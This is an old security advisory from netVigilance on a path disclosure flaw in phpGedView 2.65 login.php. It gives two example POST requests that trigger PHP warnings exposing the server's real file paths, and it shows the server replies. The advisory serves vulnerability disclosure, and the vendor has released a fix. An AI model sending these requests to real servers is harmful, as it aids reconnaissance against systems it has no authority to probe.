netVigilance Security Advisory 1

PhpGedView Path Disclosure Vulnerability


Description:
login.php in phpGedView 2.65 and earlier allows remote attackers to obtain sensitive information via an HTTP request to login.php that does not contain the required username or password parameters, which causes the information to be leaked in an error message.

External References:
Mitre CVE: CAN-2004-0130
Securiteam Listing: unixfocus/5NP0M1PBPQ

Summary:
phpGedView is an open source system for online viewing of Gedcom information (family tree and genealogy information). A security problem in the product allows attackers to gather the true path of the server-side script.

Release Date:
January 25 2004

Severity:
Medium

SecureScout Testcase ID:
TC 17865(released Feb 6th)

Vulnerable Systems:
phpGedView version 2.65 and prior

Vulnerability Type:
Input Validation error - The login.php script is not testing if a variable which is supposed to be posted has been defined before using it.

Vendor Status:
The Vendor has been notified and has Released a Version 2.65.3 that fixes the problem

Example:
I - Path disclosure

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA: action=login

-- HTTP Client Request --

Username and password are missing and will generate an PHP error message
displaying the Real Path.

-- HTTP Server Reply --

< br /> < b>Warning< /b>: Undefined index: username in
< b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < br />
< b>Warning< /b>: Undefined index: password in
< b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < br />
< b>Warning< /b>: Cannot add header information - headers already sent by (output
started at /var/www/phpGedView/login.php:36) in
< b>/var/www/phpGedView/functions_print.php< /b> on line < b>492< /b>< br />

-- HTTP Server Reply --

-------------------------------------------

II - Path disclosure with a valid user account

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA:
action=login&url=editconfig.php&usertime=&username=admin&password=login

-- HTTP Client Request --

Username/password must be a valid couple. The usertime is missing and will
generate an PHP error message displaying the Real Path.

-- HTTP Server Reply --

< br /> < b>Warning< /b>: strtotime() called with empty time parameter in
< b>/var/www/phpGedView/login.php< /b> on line < b>39< /b>< br< br /> < b>Warning< /b>:
Cannot add header information - headers already sent by (output started at
/var/www/phpGedView/login.php:39) in < b>/var/www/phpGedView/login.php< /b> on
line < b>44< /b>< br /> />

-- HTTP Server Reply --

Credits:
Cedric Cochin - netVigilance Vulnerability Research team

back to Security Advisories
 

    Copyrightę2004,  netVigilance, Inc.   All rights reserved